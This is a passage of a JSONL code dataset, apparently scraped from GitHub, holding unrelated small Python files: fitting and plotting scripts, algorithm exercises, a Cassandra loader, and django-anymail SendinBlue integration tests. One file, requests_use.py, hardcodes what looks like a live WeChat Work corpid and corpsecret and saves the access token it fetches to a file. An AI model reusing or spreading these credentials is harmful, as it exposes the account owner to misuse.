optimize.minimize(fitfun, [1e-7, 1e-7, 1e-7], method='Nelder-Mead', options={'xatol':1e-11})\n print('Parameters of minimization: {}'.format(minimum.x))\n print('Alphas: {}, {}, {}'.format(alpha1,alpha2,alpha3))\n # Make some magic pictures\n fig = plt.figure()\n ax = fig.add_subplot(111)\n final_taus = minimum.x\n xs = np.zeros(len(v_fit))\n fit_ys = np.zeros(len(v_fit))\n calc_ys = np.zeros(len(v_fit))\n for i,val in enumerate(v_fit):\n input_val = i * dt\n fit_ys[i] = exponential_model(input_val, final_taus[0], final_taus[1], final_taus[2])\n calc_ys[i] = val \n xs[i] = input_val \n ax.plot(xs, calc_ys, 'b', xs, fit_ys, 'r')\n plt.show()\n \n \n f = open('t_vs_p2.csv', 'w')\n f.write('time,p2\\n')\n for i,val in enumerate(v):\n f.write('{},{}\\n'.format(i*dt,val))\n f.close() \n\nif __name__ == '__main__':\n main()\n\n","repo_name":"stationarysalesman/mister-disky","sub_path":"disky2.py","file_name":"disky2.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"32670012618","text":"# Check Prime Number\nimport math\nimport random\n\n\ndef isPrime(n):\n print(\"n = \", n)\n sqrtN = int(math.sqrt(n))\n for i in range(2, sqrtN):\n if n % i == 0:\n print(\"i = \", i)\n return \"n is not prime\"\n return \"n is prime\"\n\n\nprint(isPrime(random.randrange(2, 32768)))\n","repo_name":"MinhoJJang/2023-first-semester","sub_path":"DataScience/Assignment/Week_01/isPrime.py","file_name":"isPrime.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"37692581641","text":"from typing import Any\n\n__all__ = (\n 'Node',\n 'Graph'\n)\n\n\nclass Node:\n def __init__(self, value: Any):\n self.value = value\n\n self.outbound = []\n self.inbound = []\n\n def point_to(self, other: 'Node'):\n self.outbound.append(other)\n other.inbound.append(self)\n\n def __str__(self):\n return f'Node({repr(self.value)})'\n\n __repr__ = __str__\n\n\nclass Graph:\n def __init__(self, root: Node):\n self._root = root\n\n def dfs(self) -> list[Node]:\n def recursive_dfs(node, res):\n if node not in res:\n res.append(node)\n for other in node.outbound:\n recursive_dfs(other, res)\n return\n\n result = [self._root]\n for node in self._root.outbound:\n recursive_dfs(node, result)\n return result\n\n\n\n def bfs(self) -> list[Node]:\n result = []\n queue = [self._root]\n while queue:\n if queue[-1] not in result:\n node = queue.pop()\n result.append(node)\n queue = node.outbound[::-1] + queue\n else:\n queue.pop()\n\n return result\n","repo_name":"eprush/hw-backend-summer-2023-1-algorithms","sub_path":"tasks/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"16293257724","text":"def get_days_in_month(month, year):\n\tif month in [4,6,9,11]:\n\t\treturn 30\n\telif month == 2:\n\t\tif year % 4 == 0:\n\t\t\tif year % 100 == 0 and year % 400 != 0:\n\t\t\t\treturn 28\n\t\t\treturn 29\n\t\telse:\n\t\t\treturn 28\n\telse:\n\t\treturn 31\n\n# Week starts on sunday = 0\nmonth_start_day = (1 + 365) % 7 # Initialize by knowing: 1 Jan 1900 was a Monday\nmonth = 1\nyear = 1901\n\ncount = 0\ndays_in_month = 0\nwhile year < 2001:\n\tmonth = 1\n\twhile month < 13:\n\t\t# Check this month start day\n\t\tif month_start_day == 0:\n\t\t\tcount += 1\n\n\t\t# Set up next month\n\t\tmonth_start_day = (month_start_day + get_days_in_month(month, year)) % 7\n\t\tmonth += 1\n\n\tyear += 1\n\nprint(count)","repo_name":"sabaduy/ProjectEuler","sub_path":"python/0019.py","file_name":"0019.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"39164027705","text":"import cassandra.cluster\nimport generator\nfrom cql_utils import *\n\nc = cassandra.cluster.Cluster(['localhost'])\nks = c.connect('chembise_metar_1_12')\n\ndata = generator.loadata()\n\ni = 0\nfor row in data:\n i = i + 1\n if (i % 1000) == 0:\n print(i)\n row = split_daytime(row)\n query = format_insert_query(\"date_by_location\", row)\n\n ks.execute(query)\n","repo_name":"danousna/metar","sub_path":"insert-data.py","file_name":"insert-data.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"20663318670","text":"import os\nimport glob\nimport argparse\n\nimport pandas as pd\nimport torch\n\nfrom utils.objdict import ObjDict\nfrom utils.mkdir_p import mkdir_p\n\nnext_line = '\\n'\nsaved_label_key = \"pred_ids\"\nof_mapping_key = \"overflow_mapping\"\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('input_path',type=str)\n parser.add_argument('--write_dataset_only',action='store_true')\n parser.add_argument('--add_id',action='store_true')\n return parser.parse_args()\n\ndef convert_ids_to_string(cfg,device='cuda',out_str='pred_str.txt',write_dataset_only=False,add_id=False):\n pp = cfg.pipeline\n out_dict = {}\n checkpts = pp.get_model_checkpts(cfg.extract_cfg.model_dir,cfg.extract_cfg.model_key)\n if add_id:\n textids = pd.read_csv(cfg.preprocess_cfg.test_csv_path).id\n \n outfile = open(os.path.join(cfg.extract_cfg.output_dir,out_str),\"w\")\n checkpts.sort()\n for c in checkpts:\n print(\"Processing checkpoint \"+c)\n outfile.write(\"*\"*100+next_line)\n outfile.write(c+next_line)\n outfile.write(\"*\"*100+next_line)\n cdir = os.path.join(cfg.extract_cfg.output_dir,c)\n if not os.path.exists(cdir):\n print(cdir+\" not exist\")\n continue\n fs = [f for f in os.listdir(cdir) if \".pt\" in f]\n fs.sort()\n if not fs:\n print(\"empty folder: {}, skipping\".format(c))\n continue\n pred_ids = torch.cat([torch.load(os.path.join(cdir,f)) for f in fs if saved_label_key in f])\n if add_id:\n ids = torch.cat([torch.load(os.path.join(cdir,f)) for f in fs if of_mapping_key in f])\n pred_ids[pred_ids==-1] = 0\n if write_dataset_only:\n pred_idx = torch.sum(pred_ids,axis=1)!=0\n pred_ids = pred_ids[pred_idx]\n ids = ids[pred_idx]\n pp.print_message(c)\n\n strs = cfg.tokenizer.batch_decode(pred_ids,skip_special_tokens=True)\n if add_id:\n outfile.write(next_line.join([str(textids[int(ids[i])])+\": \"+str(i)+\", \"+s for i,s in enumerate(strs) if s]))\n else:\n outfile.write(next_line.join([str(i)+\", \"+s for i,s in enumerate(strs) if s]))\n outfile.write(next_line)\n outfile.close()\n\nif __name__ == \"__main__\":\n\n args = parse_arguments()\n\n if \"*\" in args.input_path:\n paths = glob.glob(args.input_path)\n else:\n paths = args.input_path.split(\",\")\n\n assert len(paths) > 0\n \n cfgs = [ObjDict.read_all_from_file_python3(p) for p in paths]\n assert all([hasattr(c,\"plot_label\",) for c in cfgs])\n \n data = {}\n for c in cfgs:\n convert_ids_to_string(c,write_dataset_only=args.write_dataset_only,add_id=args.add_id) \n","repo_name":"lucien1011/kaggle-coleridgeinitiative-show-us-the-data","sub_path":"postprocessing/make_text_from_saved_ids.py","file_name":"make_text_from_saved_ids.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"40773490289","text":"import os\nimport unittest\nfrom datetime import datetime, timedelta\nfrom email.utils import formataddr\n\nfrom django.test import SimpleTestCase, override_settings, tag\n\nfrom anymail.exceptions import AnymailAPIError\nfrom anymail.message import AnymailMessage\n\nfrom .utils import AnymailTestMixin\n\nANYMAIL_TEST_SENDINBLUE_API_KEY = os.getenv(\"ANYMAIL_TEST_SENDINBLUE_API_KEY\")\nANYMAIL_TEST_SENDINBLUE_DOMAIN = os.getenv(\"ANYMAIL_TEST_SENDINBLUE_DOMAIN\")\n\n\n@tag(\"sendinblue\", \"live\")\n@unittest.skipUnless(\n ANYMAIL_TEST_SENDINBLUE_API_KEY and ANYMAIL_TEST_SENDINBLUE_DOMAIN,\n \"Set ANYMAIL_TEST_SENDINBLUE_API_KEY and ANYMAIL_TEST_SENDINBLUE_DOMAIN \"\n \"environment variables to run SendinBlue integration tests\",\n)\n@override_settings(\n ANYMAIL_SENDINBLUE_API_KEY=ANYMAIL_TEST_SENDINBLUE_API_KEY,\n ANYMAIL_SENDINBLUE_SEND_DEFAULTS=dict(),\n EMAIL_BACKEND=\"anymail.backends.sendinblue.EmailBackend\",\n)\nclass SendinBlueBackendIntegrationTests(AnymailTestMixin, SimpleTestCase):\n \"\"\"SendinBlue v3 API integration tests\n\n SendinBlue doesn't have sandbox so these tests run\n against the **live** SendinBlue API, using the\n environment variable `ANYMAIL_TEST_SENDINBLUE_API_KEY` as the API key,\n and `ANYMAIL_TEST_SENDINBLUE_DOMAIN` to construct sender addresses.\n If those variables are not set, these tests won't run.\n\n https://developers.sendinblue.com/docs/faq#section-how-can-i-test-the-api-\n\n \"\"\"\n\n def setUp(self):\n super().setUp()\n self.from_email = \"from@%s\" % ANYMAIL_TEST_SENDINBLUE_DOMAIN\n self.message = AnymailMessage(\n \"Anymail SendinBlue integration test\",\n \"Text content\",\n self.from_email,\n [\"test+to1@anymail.dev\"],\n )\n self.message.attach_alternative(\"
HTML content
\", \"text/html\")\n\n def test_simple_send(self):\n # Example of getting the SendinBlue send status and message id from the message\n sent_count = self.message.send()\n self.assertEqual(sent_count, 1)\n\n anymail_status = self.message.anymail_status\n sent_status = anymail_status.recipients[\"test+to1@anymail.dev\"].status\n message_id = anymail_status.recipients[\"test+to1@anymail.dev\"].message_id\n\n self.assertEqual(sent_status, \"queued\") # SendinBlue always queues\n # Message-ID can be ...@smtp-relay.mail.fr or .sendinblue.com:\n self.assertRegex(message_id, r\"\\<.+@.+\\>\")\n # set of all recipient statuses:\n self.assertEqual(anymail_status.status, {sent_status})\n self.assertEqual(anymail_status.message_id, message_id)\n\n def test_all_options(self):\n send_at = datetime.now() + timedelta(minutes=2)\n message = AnymailMessage(\n subject=\"Anymail SendinBlue all-options integration test\",\n body=\"This is the text body\",\n from_email=formataddr((\"Test From, with comma\", self.from_email)),\n to=[\"test+to1@anymail.dev\", '\"Recipient 2, OK?\" '],\n cc=[\"test+cc1@anymail.dev\", \"Copy 2 \"],\n bcc=[\"test+bcc1@anymail.dev\", \"Blind Copy 2 \"],\n # SendinBlue API v3 only supports single reply-to\n reply_to=['\"Reply, with comma\" '],\n headers={\"X-Anymail-Test\": \"value\", \"X-Anymail-Count\": 3},\n metadata={\"meta1\": \"simple string\", \"meta2\": 2},\n send_at=send_at,\n tags=[\"tag 1\", \"tag 2\"],\n )\n # SendinBlue requires an HTML body:\n message.attach_alternative(\"
HTML content
\", \"text/html\")\n\n message.attach(\"attachment1.txt\", \"Here is some\\ntext for you\", \"text/plain\")\n message.attach(\"attachment2.csv\", \"ID,Name\\n1,Amy Lina\", \"text/csv\")\n\n message.send()\n # SendinBlue always queues:\n self.assertEqual(message.anymail_status.status, {\"queued\"})\n self.assertRegex(message.anymail_status.message_id, r\"\\<.+@.+\\>\")\n\n def test_template(self):\n message = AnymailMessage(\n # There is a *new-style* template with this id in the Anymail test account:\n template_id=5,\n # Override template sender:\n from_email=formataddr((\"Sender\", self.from_email)),\n # No batch send (so max one recipient suggested):\n to=[\"Recipient \"],\n reply_to=[\"Do not reply \"],\n tags=[\"using-template\"],\n headers={\"X-Anymail-Test\": \"group: A, variation: C\"},\n merge_global_data={\n # The Anymail test template includes `{{ params.SHIP_DATE }}`\n # and `{{ params.ORDER_ID }}` substitutions\n \"SHIP_DATE\": \"yesterday\",\n \"ORDER_ID\": \"12345\",\n },\n metadata={\"customer-id\": \"ZXK9123\", \"meta2\": 2},\n )\n\n # Normal attachments don't work with Brevo templates:\n # message.attach(\"attachment1.txt\", \"Here is some\\ntext\", \"text/plain\")\n # If you can host the attachment content on some publicly-accessible URL,\n # this *non-portable* alternative allows sending attachments with templates:\n message.esp_extra = {\n \"attachment\": [\n {\n \"name\": \"attachment1.txt\",\n # URL where Brevo can download the attachment content while\n # sending (must be content-type: text/plain):\n \"url\": \"https://raw.githubusercontent.com/anymail/django-anymail/\"\n \"main/docs/_readme/template.txt\",\n }\n ]\n }\n\n message.send()\n # SendinBlue always queues:\n self.assertEqual(message.anymail_status.status, {\"queued\"})\n self.assertRegex(message.anymail_status.message_id, r\"\\<.+@.+\\>\")\n\n @override_settings(ANYMAIL_SENDINBLUE_API_KEY=\"Hey, that's not an API key!\")\n def test_invalid_api_key(self):\n with self.assertRaises(AnymailAPIError) as cm:\n self.message.send()\n err = cm.exception\n self.assertEqual(err.status_code, 401)\n # Make sure the exception message includes SendinBlue's response:\n self.assertIn(\"Key not found\", str(err))\n","repo_name":"anymail/django-anymail","sub_path":"tests/test_sendinblue_integration.py","file_name":"test_sendinblue_integration.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","stars":1517,"dataset":"github-code","pt":"39"}
+{"seq_id":"15693931589","text":"class Solution:\n \"\"\"\n 给定一个整数数组 nums ,找到一个具有最大和的连续子数组(子数组最少包含一个元素),返回其最大和\n 主要思想,只有当sum[:i]-sum[:j]>0的时候,才会对最大和有帮助\n\n [num[0], num[1],......num[i]......num[n-1]]\n 动态规划的是首先对数组进行遍历,当前位置i最大连续子序列和为 sum,sum起始值为0,历史最大子序列结果为 ans,ans起始值为num[0]\n 如果 sum > 0,则说明 sum 对结果有增益效果,则 sum 保留并加上当前遍历数字\n 如果 sum <= 0,则说明 sum 对结果无增益效果,需要舍弃,则 sum 直接更新为当前遍历数字\n 每次比较 当前sum 和 历史ans的大小,将最大值置为ans,继续往后遍历,遍历结束返回结果\n 时间复杂度:O(n)\n \"\"\"\n @staticmethod\n def max_sub_array(nums):\n sum = 0\n history_max_sum = nums[0]\n for num in nums:\n if sum > 0:\n sum += num\n else:\n sum = num\n print(\"历史最大值以及当前最大值:\",history_max_sum,sum)\n history_max_sum = max(history_max_sum,sum)\n return history_max_sum\n\n def maxSubArray(nums):\n pre_sum = 0\n ans = nums[0]\n for num in nums:\n pre_sum = max(pre_sum+num, num)\n print(pre_sum,ans)\n ans = max(pre_sum,ans)\n return ans\n\nif __name__ == \"__main__\":\n nums = [-2,1,-3,4,-1,2,1,-5,4]\n result = Solution.max_sub_array(nums)\n print(\"The max su array is:\", result)\n\n\n\n\n","repo_name":"tinghe0928/leetcode","sub_path":"sliding_window/max_sub_array.py","file_name":"max_sub_array.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"25599571509","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 23 17:41:00 2018\n\n@author: bencooper\n\"\"\"\n\nimport os\n\nclass DirGen:\n @staticmethod\n def create_dir(path):\n if os.path.isdir(path) == False:\n os.makedirs(path)\n ","repo_name":"cooperb0199/TSForecasting","sub_path":"utils/dir_generator.py","file_name":"dir_generator.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"9147523534","text":"#!/usr/bin/env python\n\n#figure parameter set up\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.dpi'] = 100\nplt.rcParams[\"figure.figsize\"] = [15.0, 6.0]\n# %config InlineBackend.figure_format = 'svg'\n# %matplotlib inline\n\nimport pandas as pd\n\ntotal_match = pd.read_csv('vis_results/total_match.csv', sep = ',')\n\nno_prediction = pd.read_csv('vis_results/no_prediction.csv', sep = ',')\n\nno_prediction_but_E = pd.read_csv('vis_results/no_prediction_but_enzyme.csv', sep = ',')\n\n\nnon_enzyme_correct = pd.read_csv('vis_results/non_enzyme_correct.csv', sep = ',')\n\nPNEBE = pd.read_csv('vis_results/predicted_non_enzyme_but_enzyme.csv', sep = ',')\n\n\nPEBnonE = pd.read_csv('vis_results/predicted_enzyme_but_non_enzyme', sep = ',')\n\ntotal_correct = pd.read_csv('vis_results/correct_to_fourth_digit.csv', sep = ',')\n\n\nthird_digit_correct = pd.read_csv('vis_results/correct_to_third_digit.csv', sep = ',')\n\n\nsecond_digit_correct = pd.read_csv('vis_results/correct_to_second_digit.csv', sep = ',')\n\n\nfirst_digit_correct = pd.read_csv('vis_results/correct_to_first_digit.csv', sep = ',')\n\nfirst_digit_wrong = pd.read_csv('vis_results/first_digit_wrong.csv', sep = ',')\n\ndf_EC = pd.read_csv('vis_results/df_EC.csv', sep = ',')\n\nimport matplotlib.pyplot as plt\n\n\n\ndataframes = [no_prediction,\n PNEBE,\n PEBnonE,\n non_enzyme_correct,\n total_match,\n third_digit_correct,\n second_digit_correct,\n first_digit_correct,\n first_digit_wrong]\n\n\n\nlengths = [len(i) for i in dataframes[0:4]]\ndigits = [len(i) for i in dataframes[4:]]\nlengths.append(sum(digits))\n\npercent_lengths = [i/sum(lengths) for i in lengths]\n\npercent_digits = [i/sum(digits) for i in digits]\n\nbarwidth = 1\n\n\n# create data\nx = ['ECpred \\noverall \\nperformance']\n\n\nlabel_list_lengths = ['No Prediction',\n 'Predicted Non-Enzyme but Enzyme',\n 'Predicted Enzyme but non-Enzyme',\n 'Non Enzyme Correct',\n 'Predicted EC number'] \n\n\ny1 = percent_lengths[4]\ny2 = percent_lengths[3]\ny3 = percent_lengths[2]\ny4 = percent_lengths[1]\ny5 = percent_lengths[0]\n\ncolor = ['b','c','y','g','r']\n# plot bars in stack manner\nplt.bar(x, y1, color= 'b')#color[0])\nplt.bar(x, y2, bottom=y1, color='c')\nplt.bar(x, y3, bottom=y1+y2, color='y')\nplt.bar(x, y4, bottom=y1+y2+y3, color= 'g')\nplt.bar(x, y5, bottom= y1+y2+y3+y4, color = 'r')#'#ff9500')\nplt.legend(label_list_lengths[::-1], bbox_to_anchor=(1.5,1.5), ncol=5,loc='center')\n\n# create data\nx = ['ECpred \\ndigits']\n\n\n\nlabel_list_digits = ['Total correct',\n 'third digit correct',\n 'second digit correct',\n 'first digit correct',\n 'first digit wrong']\n\n\ny1 = percent_digits[0]\ny2 = percent_digits[1]\ny3 = percent_digits[2]\ny4 = percent_digits[3]\ny5 = percent_digits[4]\n \n# plot bars in stack manner\ncolors = ['#377697','#4fa9d9','#72bae0','#a7d4ec','#fdab91']\nplt.rcParams[\"figure.figsize\"] = [5,5]\nplt.bar(x, y1, color= colors[0])#, width = barwidth)\nplt.bar(x, y2, bottom=y1, color = colors[1])#, width = barwidth), width = barwidth)\nplt.bar(x, y3, bottom=y1+y2,color = colors[2])#, width = barwidth), width = barwidth)\nplt.bar(x, y4, bottom=y1+y2+y3, color = colors[3])#, width = barwidth), width = barwidth)\nplt.bar(x, y5, bottom= y1+y2+y3+y4, color = colors[4])#, width = barwidth), width = barwidth)\n\n\n\nplt.ylabel(\"Fraction of the Whole\")\nplt.legend(label_list_digits, bbox_to_anchor=(1.5,1.5), ncol=5,loc='center')\n\nplt.savefig('vis_results/overall_performance.png', format='png', dpi=800)\n\nprint('all done')","repo_name":"Sakib1418/Benchmarking-Enzyme-Classifiers","sub_path":"visualization/overall_performance.py","file_name":"overall_performance.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"1049945562","text":"\"\"\"Here you will find functions for getting rid of the same data points.\"\"\"\nfrom math import inf\nimport numpy as np\n\n\ndef dedup(x, y):\n\t\"\"\"Deduplicate the arguments for fitting.\n\t\n\tArgs:\n\t\tx (iterable): values to dedup.\n\t\ty (iterable): corresponding values.\n\tReturns:\n\t\ttuple with values from the input, but retaining only the first\n\t\tamong the repeating ones.\n\t\"\"\"\n\tx1 = []\n\ty1 = []\n\tXprev = -inf\n\tfor X,Y in zip(x,y):\n\t\tif X > Xprev:\n\t\t\tx1.append(X)\n\t\t\ty1.append(Y)\n\t\tXprev = X\n\treturn x1, y1\n\n\ndef dedup_np(x,y):\n\t\"\"\"Deduplicate the arguments for fitting.\n\t\n\tMuch faster then dedup.\n\n\tArgs:\n\t\tx (np.array): values to dedup.\n\t\ty (np.array): corresponding values.\n\tReturns:\n\t\ttuple with values from the input, but retaining only the first\n\t\tamong the repeating ones.\n\t\"\"\"\n\to = np.full(x.shape, True)\n\to[1:] = np.diff(x) > 0\n\treturn x[o], y[o]\n\n\n","repo_name":"MatteoLacki/rta","sub_path":"rta/array_operations/dedupy.py","file_name":"dedupy.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"27870485744","text":"import requests\n\n\ndef test_request():\n url = 'http://httpbin.org/get'\n payload = {'key1':'value1','key2':['value2', 'value3']}\n r = requests.get(url,params = payload)\n print(r)\n\n with open('','r',encoding='utf-8') as f:\n file = f.read()\n\ndef test_request1():\n id = 'wwdae6409305b8bd0c'\n select = 'yfVfCz4aehQ1etcO9Rqh9lx9GPpdcjute5Zyi9w8ZO0'\n url = 'https://qyapi.weixin.qq.com/cgi-bin/gettoken'\n header ={'corpid':'wwdae6409305b8bd0c',\n 'corpsecret':'yfVfCz4aehQ1etcO9Rqh9lx9GPpdcjute5Zyi9w8ZO0'}\n #r =requests.get(url,headers=headers)\n\n r = requests.get(url,params=header)\n print(r.json())\n token = r.json()['access_token']\n print(token)\n with open('token.yaml','w',encoding='UTF-8') as f:\n f.write(token)\n\n\n\n\n\n","repo_name":"zhuanfang/python","sub_path":"file/从零学Python/day06/requests_use.py","file_name":"requests_use.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"32421586302","text":"import matplotlib.pyplot as plt\nimport random\n\ndef createPlot() :\n # Générer des données aléatoires\n\n plt.clf()\n\n nombre_requetes = 100\n temps = list(range(nombre_requetes))\n valeurs = [random.randint(0, 100) for _ in range(nombre_requetes)]\n\n # Créer le graphique\n plt.plot(temps, valeurs)\n plt.xlabel('Temps')\n plt.ylabel('Nombre de requêtes')\n\n # Sauvegarder le graphique au format JPEG\n plt.savefig('static/img/graphique.jpg', format='jpeg')","repo_name":"pleijan/AwareNet","sub_path":"CreatePlot.py","file_name":"CreatePlot.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"31927559884","text":"import random\n\nclass Rational:\n def __init__(self, num, den):\n self.num = num\n self.den = den\n \n def mul(self, other):\n if isinstance(other, Rational):\n num = self.num * other.num\n den = self.den * other.den\n return Rational(num, den)\n elif isinstance(other, int):\n num = self.num * other\n return Rational(num, self.den)\n else:\n raise TypeError(\"Unsupported operand type(s) for *: '{}' and '{}'\".format(type(self), type(other)))\n \n def truediv(self, other):\n if isinstance(other, Rational):\n num = self.num * other.den\n den = self.den * other.num\n return Rational(num, den)\n elif isinstance(other, int):\n den = self.den * other\n return Rational(self.num, den)\n else:\n raise TypeError(\"Unsupported operand type(s) for /: '{}' and '{}'\".format(type(self), type(other)))\n \n @staticmethod\n def random_fraction(low, high):\n num = random.randint(low, high)\n den = random.randint(low, high)\n while den == 0:\n den = random.randint(low, high)\n return Rational(num, den)","repo_name":"NikitaKurganovich/BSUIR","sub_path":"MPL/Lab/Lab3/Part 1/Rational.py","file_name":"Rational.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"17707724767","text":"from tkinter import *\nfrom tkinter import messagebox\nimport json\nimport os\nfrom notes import notes\n\n\ndef registration_successfully_completed():\n btn.destroy()\n global folder_name\n lbl = Label(root, text='Приветствуем вас {}, авторизация успешно пройдена!!'.format(txt.get()))\n lbl.grid(column=0, row=0)\n folder_name = txt.get()\n txt.delete('0', END)\n txt.destroy()\n try:\n os.mkdir(f'{folder_name}')\n label = Label(root, text='Под вашим никнеймом предыдущих заметок не обнаружено')\n label.grid(column=0, row=2)\n button = Button(root, text=\"Создать новую заметку!\", command=go_in_notes)\n button.grid(column=0, row=3)\n except:\n found_old_files(folder_name)\n\n\ndef go_in_notes():\n notes(folder_name)\n\n\ndef found_old_files(entered_text):\n otvet = []\n row = 1\n try:\n for filename in os.listdir(f'{entered_text}'):\n with open(os.path.join(f'{entered_text}', filename), 'r') as file:\n text = file.read()\n found_files = (filename, 'с текстом:', text)\n otvet.append(found_files)\n label = Label(root, text='Под вашим никнеймом обнаружены следующие файлы:')\n label.grid(column=0, row=1)\n for i in range(len(otvet)):\n row += 1\n label = Label(root, text=f'{otvet[i][0]}' + ':' + ' ' + f'{otvet[i][2]}')\n label.grid(column=0, row=row)\n button = Button(root, text=\"Создать новую заметку!\", command=go_in_notes)\n button.grid(column=0, row=row + 1)\n except:\n return False\n\n\ndef user_registration():\n data = json.dumps(txt.get(), ensure_ascii=False)\n data = json.loads(str(data))\n\n with open('data.json', 'r') as filik:\n dict_data = json.load(filik)\n dict_data[f'{txt.get()}'] = ['авторизация успешно пройдена']\n\n with open('data.json', 'w') as file:\n json.dump(dict_data, file, ensure_ascii=False, indent=3)\n registration_successfully_completed()\n\n\ndef check_for_saved_users():\n with open('data.json', 'r') as file:\n a = file.read()\n a = json.loads(a)\n check = 0\n for element in a:\n if element == txt.get():\n registration_successfully_completed()\n break\n if element != txt.get():\n check += 1\n if check == len(a):\n user_registration()\n\n\nroot = Tk()\nroot.title('Авторизация в заметки')\nroot.geometry('450x450')\n\nmenu_bar = Menu(root)\nfile_menu = Menu(menu_bar)\n\nmessagebox.showinfo('Информация',\n 'Привет, вам нужно будет ввести ваш персональный никнейм, это нужно для предоставления именно ваших заметок!')\nlbl = Label(root, text='Введите свой никнейм!')\nlbl.grid(column=0, row=0)\ntxt = Entry(root, width=15)\ntxt.grid(column=1, row=0)\ntxt.focus()\nbtn = Button(root, text=\"ОК!\", command=check_for_saved_users)\nbtn.grid(column=2, row=2)\n\nroot.config(menu=menu_bar)\nroot.mainloop()\n","repo_name":"AppleIpx/python-notes","sub_path":"functions_for_the_notes.py","file_name":"functions_for_the_notes.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"45749032740","text":"import graphene\nimport graphql_jwt\n\n# import links.schema\n# import links.schema_relay\nimport users.schema\nimport rooms.schema\nimport msgs.schema\n\nclass Query(\n users.schema.Query,\n rooms.schema.Query,\n msgs.schema.Query,\n # links.schema.Query,\n # links.schema_relay.RelayQuery,\n graphene.ObjectType,\n):\n pass\n\n\nclass Mutation(\n users.schema.Mutation,\n rooms.schema.Mutation,\n msgs.schema.Mutation,\n # links.schema.Mutation,\n # links.schema_relay.RelayMutation,\n graphene.ObjectType,\n):\n\n login = graphql_jwt.ObtainJSONWebToken.Field()\n verify_token = graphql_jwt.Verify.Field()\n refresh_token = graphql_jwt.Refresh.Field()\n\n\nschema = graphene.Schema(query=Query, mutation=Mutation)\n","repo_name":"rajzik/docker-webapp","sub_path":"server/webapp/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"27144460030","text":"#!/usr/bin/env python\n\nimport argparse\nimport csv\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nplt.style.use('dark_background')\n\ndef read_csv(filename, has_header=True):\n rows = []\n with open(filename, 'r') as f:\n reader = csv.reader(f, delimiter=',')\n if has_header:\n header = tuple(map(str.rstrip, next(reader)))\n for line in reader:\n rows.append(tuple(map(float, line)))\n if not has_header:\n header = ('',) * len(rows[0])\n return header, rows\n\ndef read_gnuplot(filename):\n rows = []\n with open(filename, 'r') as f:\n for line in f:\n split_line = line.split()\n rows.append(tuple(map(float, split_line)))\n return [''] * len(rows[0]), rows\n\ndef plot_time_series(csv_filename, out_filename, ylim=None, title=None,\n ticks=None, nrows=1, case=''):\n styles = [\n {'color': '#00ffff', 'linewidth': 2},\n {'color': '#ff00ff', 'linewidth': 2},\n {'color': '#00cfcf', 'linewidth': 2},\n {'color': '#cf00cf', 'linewidth': 2},\n {'color': '#00afaf', 'linewidth': 2},\n {'color': '#af00af', 'linewidth': 2},\n {'color': '#008f8f', 'linewidth': 2},\n {'color': '#8f008f', 'linewidth': 2},\n {'color': '#006f6f', 'linewidth': 2},\n {'color': '#6f006f', 'linewidth': 2},\n ]\n header, rows = read_csv(csv_filename)\n series = list(map(np.array, zip(*rows)))\n t = series[0]\n\n if case == 'eigenvalues':\n # series[1:] = [np.sign(s) * np.log10(np.abs(s) + 1) for s in series[1:]]\n series[1:] = [np.log10(np.abs(s) + 1) for s in series[1:]]\n\n fig, axes = plt.subplots(nrows=nrows, sharex=True)\n\n if nrows == 1:\n axes = [axes]\n plot_multiple(axes[0], t, zip(styles, header[1:], series[1:]))\n elif nrows == 2:\n plot_multiple(axes[0], t, zip(styles[:-1], header[1:-1], series[1:-1]))\n plot_multiple(axes[1], t, [(styles[-1], header[-1], series[-1])])\n\n axes[0].set_title(title)\n axes[0].set_ylim(ylim)\n axes[-1].set_xlabel(header[0])\n for ax in axes:\n ax.legend(framealpha=0.9, loc='upper right')\n if ticks is not None:\n axes[-1].set_xlim((0.0, ticks[-1] + 0.5))\n axes[-1].set_xticks(ticks)\n fig.savefig(out_filename, dpi=300)\n\ndef plot_multiple(ax, x, it):\n for i, (style, label, data) in enumerate(it):\n mask = ~np.isnan(data)\n x_ = x[mask]\n data = data[mask]\n ax.plot(x_, data, label=label, zorder=-i, 